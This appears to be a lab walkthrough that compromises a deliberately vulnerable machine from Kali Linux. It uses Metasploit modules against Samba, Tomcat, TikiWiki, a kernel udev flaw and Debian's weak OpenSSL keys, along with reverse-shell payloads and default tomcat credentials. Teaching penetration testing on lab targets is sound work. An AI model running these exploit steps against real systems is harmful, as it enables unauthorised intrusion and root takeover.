For the attacking machine, I will be using Kali 2017.1. Once booted, this is what the victim machine will look like:

We start the attack by finding the IP of the victim machine by using the netdiscover command: $ netdiscover

Now that we know our target IP, let’s start by scanning the ports and try to get more information about it:

The scan shows us that the following ports are open:

Port 21 – Running FTP Port 22 – Running OpenSSH Port 23 – Running Telnet Port 25 – Running SMTP Port 80 – Running Apache Web server Port 139 – Running Samba Port 445 – Running Samba Port 3306 – Running MySQL Port 5432 – Running PostgreSQL Port 8009 – Running Apache Jserv Port 8180 – Running Apache Tomcat

Upon visiting the web application (on port 80 via http://) we just see a default Test Page:

Looking at the source code does not reveal us anything either. Looking back at the scan results, one particular port catches my eye, Port 445 running Samba 3.0.20. Doing some basic research, I found a vulnerability (CVE 2007-2447): http://www.cvedetails.com/cve/cve-2007-2447. Let’s fire up Metasploit and see if that works: $ use exploit/multi/samba/usermap_script $ set PAYLOAD cmd/unix/reverse_netcat

And we are root! Since this took no time at all, I decided to see how many more ways I could find to exploit this machine. The next thing that caught my eye while looking back at the scan was port 8180 running Tomcat. Check that on the browser, this is what I found:

While doing some light reading, I came across the following link, https://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy, and though of giving it a try: $ use exploit/multi/http/tomcat_mgr_deploy $ use payload/java/meterpreter/reverse_tcp $ set httpusername tomcat $ set httppassword tomcat $ set target 0 $ set RPORT 8180

We did get a low privilege shell. Let’s see how we can escalate our privilege! While looking around, I saw that the kernel is vulnerable to the following exploit: https://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink Let’s give it a shot: $ use exploit/linux/local/udev_netlink And we get root! Note: Since the default credentials are tomcat: tomcat, you can log in at http://172.16.92.139:8180/admin and play around a bit as well. Next, I thought of playing around with PostgreSQL. I tried to run a scan, and it came up with a username and password: $ use auxiliary/scanner/postgres/postgres_login

Moving on, I wanted to do something with the web app. So, I bring my old friend, dirbuster out to real the secrets:

TWiki looks interesting. Going to the browser it shows:

Let’s see if Metasploit has anything on it:

Let’s start with this:

We are getting somewhere. Now let’s try a remote PHP code execution exploit we saw earlier:

$ use exploit/unix/webapp/tikiwiki_graph_formula_exec

We do get a limited shell. However, it took a few attempts before the shell was spawned. Checking its root directory shows us:

Let’s see what ssh has:

Let’s ssh with these credentials: Note: You’ll need to download the following keys in order to search: https://hdm.io/tools/debian-openssl/ (2048 bit RSA) In the folder, let’s search for a key: $ grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w

And now, time to get in!! $ ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@172.16.92.139

And we are root!